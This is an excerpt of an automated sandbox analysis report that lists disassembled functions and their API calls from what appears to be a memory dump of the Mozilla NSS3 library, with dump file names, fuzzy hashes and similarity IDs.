Part of subcall function 6C840FF0: PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000168), ref: 6C8466F9

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

memset.VCRUNTIME140(00000000,00000000,00000168), ref: 6C846728
PK11_GetInternalKeySlot.NSS3 ref: 6C846788
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C8467AD
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C8467C1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaUtil$Arena_Value$Alloc_AllocateCriticalEnterFreeInitInternalK11_LockOptionPoolSectionSlotUnlockcallocmemset
String ID:
API String ID: 3227582682-0
Opcode ID: 6e98d7aaf76bd4da6028223c1804a318ef3198ef85e9fe1d682fcb72a0ac51cf
Instruction ID: d9d648dd3ea650aa87840e3ad7e6592f276bef22ef696bb14200792519c1459e
Opcode Fuzzy Hash: 6e98d7aaf76bd4da6028223c1804a318ef3198ef85e9fe1d682fcb72a0ac51cf
Instruction Fuzzy Hash: 195109B1D002188FDB10CF59CA817DA7BF4AB09718F04867AEC08EB745E7749954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C81EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C81EF38

Part of subcall function 6C809520: PK11_IsLoggedIn.NSS3(00000000,?,6C83379E,?,00000001,?), ref: 6C809542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C81EF53

Part of subcall function 6C824C20: TlsGetValue.KERNEL32 ref: 6C824C4C
Part of subcall function 6C824C20: EnterCriticalSection.KERNEL32(?), ref: 6C824C60
Part of subcall function 6C824C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C824CA1
Part of subcall function 6C824C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C824CBE
Part of subcall function 6C824C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C824CD2
Part of subcall function 6C824C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C824D3A

PR_GetCurrentThread.NSS3 ref: 6C81EF9E

Part of subcall function 6C8A9BF0: TlsGetValue.KERNEL32(?,?,?,6C8F0A75), ref: 6C8A9C07

free.MOZGLUE(00000000), ref: 6C81EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C81F016
free.MOZGLUE(00000000), ref: 6C81F022

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 263d5130cfc45a215233d24a9d9be89e30770233947dd648d54492261d6a70dd
Instruction ID: 87918046a9a87b0d6237dbd7fc747115bf9bfcf2bbd8155622fcc20ee0f0a5e2
Opcode Fuzzy Hash: 263d5130cfc45a215233d24a9d9be89e30770233947dd648d54492261d6a70dd
Instruction Fuzzy Hash: 2541B271E0420AAFDF118FA9DD44BEE7BB9AF48358F004435F908A6750E772C9158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7FE400 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C803F23,?), ref: 6C7FE432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C7FE44F

Part of subcall function 6C802C40: TlsGetValue.KERNEL32(6C803F23,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C62
Part of subcall function 6C802C40: EnterCriticalSection.KERNEL32(0000001C,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C76
Part of subcall function 6C802C40: PL_HashTableLookup.NSS3(00000000,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C86
Part of subcall function 6C802C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C803F23,?), ref: 6C7FE494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C7FE4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C7FE4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C7FE52F

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 0da59e144911ac45a666a8a83255514e5c607dfdbdb2944cc201547754168db9
Instruction ID: 82d250ebe61fe06699a27d189a49506f2029e939c4716c7e58bf2f25bf976491
Opcode Fuzzy Hash: 0da59e144911ac45a666a8a83255514e5c607dfdbdb2944cc201547754168db9
Instruction Fuzzy Hash: 1A4128B5A05A158FCB11EF78D6C846ABBF0FF05304F054969E8A49B711E730E895CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F65D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6C7F660F

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

free.MOZGLUE(00000000), ref: 6C7F6660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7F667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6C7F669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C7F66B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7F66C8

Part of subcall function 6C8225D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C7F662E,?,?), ref: 6C822670
Part of subcall function 6C8225D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C7F662E,?), ref: 6C822684
Part of subcall function 6C8225D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8226C2
Part of subcall function 6C8225D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C8226E0
Part of subcall function 6C8225D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8226F4
Part of subcall function 6C8225D0: PR_Unlock.NSS3(?), ref: 6C82274D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: d55ce62c702ca1fcaa5616890bd5a426948bfcfb064584eaa989dbb4ec4ae8e5
Instruction ID: d13f44f1afce374be75ac32ca67bafd6d1186a69c9e28fdf54be1da1d18c5aa4
Opcode Fuzzy Hash: d55ce62c702ca1fcaa5616890bd5a426948bfcfb064584eaa989dbb4ec4ae8e5
Instruction Fuzzy Hash: C9318FB5A012199BDB10CFA8D981AAE77B4AF49258F100038ED19EB701E731EA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C7E2D1A), ref: 6C7F2E7E

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

PR_Now.NSS3 ref: 6C7F2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C7F2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C7E2D1A), ref: 6C7F2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C7E2D1A), ref: 6C7F2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7F2F81

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 6cef97f3557c0004563464ebe951a714a20e42dc9a2ed38bdf3c8a40fecaf250
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 3331047152518087F710C655CECDFAF72A9EB80318F64497AD43987BD1EB31998BC611

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C7E0A2C), ref: 6C7E0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C7E0A2C), ref: 6C7E0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C7E0A2C), ref: 6C7E0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C7E0A2C), ref: 6C7E0E90
free.MOZGLUE(00000000), ref: 6C7E0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C7E0A2C), ref: 6C7E0ED9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 87dbc6b30bab170887d6deacf737d23f5def07a3c4112a6ea564f72e55a025bc
Instruction ID: 822bfbd37010a00168d80a44aa9e145974abaac6b98747f5d46c4fc6f7e8b0c1
Opcode Fuzzy Hash: 87dbc6b30bab170887d6deacf737d23f5def07a3c4112a6ea564f72e55a025bc
Instruction Fuzzy Hash: 79217073E0028547EB1065799E45B6B72AFDFC974CF1D4435D81CA7A02FF70C81492A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7EAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7EAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C7EAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7EAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C7EAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C909500), ref: 6C7EAF23

Part of subcall function 6C83F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C83F0C8
Part of subcall function 6C83F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C83F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7EAF37

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 82a9643704b6e35dc1d3df0d34ab8e60d6cf8b1dba2e3ae1f65dc2d5420ac1f5
Instruction ID: 51d2de16c2be1689f886ff95a0041179c65201539504de9e8111717efe0b7fb4
Opcode Fuzzy Hash: 82a9643704b6e35dc1d3df0d34ab8e60d6cf8b1dba2e3ae1f65dc2d5420ac1f5
Instruction Fuzzy Hash: 652128729092009BEB108F189E41B9A7FF4AF9973CF144729EC589B7D1E731D50887A6

Uniqueness

Uniqueness Score: -1.00%

Function 6C86EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C86EE85
realloc.MOZGLUE(052D3AB7,?), ref: 6C86EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C86EEC5

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

htonl.WSOCK32(?), ref: 6C86EEE3
htonl.WSOCK32(00000000,?), ref: 6C86EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C86EF01

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: bd2233b4c80bf05a5b05f3ea58bccf1178603d249f8c3ad77896e0ac575ce999
Instruction ID: 4c27a0d8bb9c70beba8db56982893618f99e1ede016ce69c2000a412e84ac3c5
Opcode Fuzzy Hash: bd2233b4c80bf05a5b05f3ea58bccf1178603d249f8c3ad77896e0ac575ce999
Instruction Fuzzy Hash: 4521D331A002149FCB209F29DE8079A77A4EF45358F148579EC199FA41E730EC14CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C81EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C81EE49

Part of subcall function 6C83FAB0: free.MOZGLUE(?,-00000001,?,?,6C7DF673,00000000,00000000), ref: 6C83FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C81EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C81EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C81EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C81EEB3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: abdaf57b65853427126a73fe41c4f008bd672d6ba5d210f768bdffe3289d48ec
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 2F2135B6A042116BEB208E58DD85EABB3A8EF05708F0408B4FD089BB12F771DC1487F1

Uniqueness

Uniqueness Score: -1.00%

Function 6C842550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C842576
PORT_Alloc_Util.NSS3(00000000), ref: 6C842585

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C8425A1
_waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C8425AF
free.MOZGLUE(00000000), ref: 6C8425BB
free.MOZGLUE(00000000), ref: 6C8425CA

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
String ID:
API String ID: 3520324648-0
Opcode ID: 90720b0921b9abbc33df439c716899ab64502f640f4e0649d8ccdfc7d469348c
Instruction ID: cb0498be470fb4ad2f3b42746a07fc4d06466d5164acc09035fa4b04f7e33239
Opcode Fuzzy Hash: 90720b0921b9abbc33df439c716899ab64502f640f4e0649d8ccdfc7d469348c
Instruction Fuzzy Hash: 850128B170D2193BFF302A799D19E37755DDB426A5B214B30FC1DC5681EA68CC0086F1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F86C0 Relevance: 9.1, APIs: 6, Instructions: 54threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C8F86DE

Part of subcall function 6C7D0F00: PR_GetPageSize.NSS3(6C7D0936,FFFFE8AE,?,6C7616B7,00000000,?,6C7D0936,00000000,?,6C76204A), ref: 6C7D0F1B
Part of subcall function 6C7D0F00: PR_NewLogModule.NSS3(clock,6C7D0936,FFFFE8AE,?,6C7616B7,00000000,?,6C7D0936,00000000,?,6C76204A), ref: 6C7D0F25

PR_Lock.NSS3 ref: 6C8F8700

Part of subcall function 6C8A9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C7D1A48), ref: 6C8A9BB3
Part of subcall function 6C8A9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C7D1A48), ref: 6C8A9BC8

getprotobyname.WSOCK32(?), ref: 6C8F8709
GetLastError.KERNEL32(?), ref: 6C8F8717
PR_GetCurrentThread.NSS3(?,?), ref: 6C8F871F
PR_Unlock.NSS3(?,?), ref: 6C8F873A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobyname
String ID:
API String ID: 2388724134-0
Opcode ID: fb6c21577ccd5c64923815e9aaddcad9badc0e066e17ed3653cc656cec244598
Instruction ID: ada3edb385f76714bceb9dfd1e53f6416c6758b54dbe5610429e17a19d79199f
Opcode Fuzzy Hash: fb6c21577ccd5c64923815e9aaddcad9badc0e066e17ed3653cc656cec244598
Instruction Fuzzy Hash: 4F112572A181309BCB206FBA9A0468E3664EB473B8F154776EC1897BA1C731CC16CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 6C7CC4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7CC4F0
free.MOZGLUE ref: 6C7CC51A
TlsSetValue.KERNEL32 ref: 6C7CC540
free.MOZGLUE ref: 6C7CC557
DeleteCriticalSection.KERNEL32 ref: 6C7CC56A
free.MOZGLUE ref: 6C7CC576

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: e5e51f3257bfce3f3745014b0c7bce34d0e58d088d605c643055af23ba8fe8af
Instruction ID: 100f2cdb7596c17f3686d63f464be4597e26eec5bd27444365529839f8a7c9d7
Opcode Fuzzy Hash: e5e51f3257bfce3f3745014b0c7bce34d0e58d088d605c643055af23ba8fe8af
Instruction Fuzzy Hash: 1D113AB0A08B118FCB20BF79D14816ABBF4BF45349F154A2DD8CAC7A00EB309494CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6C7EE520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6C7F7F5D,00000000,00000000,?,?,?,6C7F80DD), ref: 6C7EE532

Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A90AB
Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A90C9
Part of subcall function 6C8A9090: EnterCriticalSection.KERNEL32 ref: 6C8A90E5
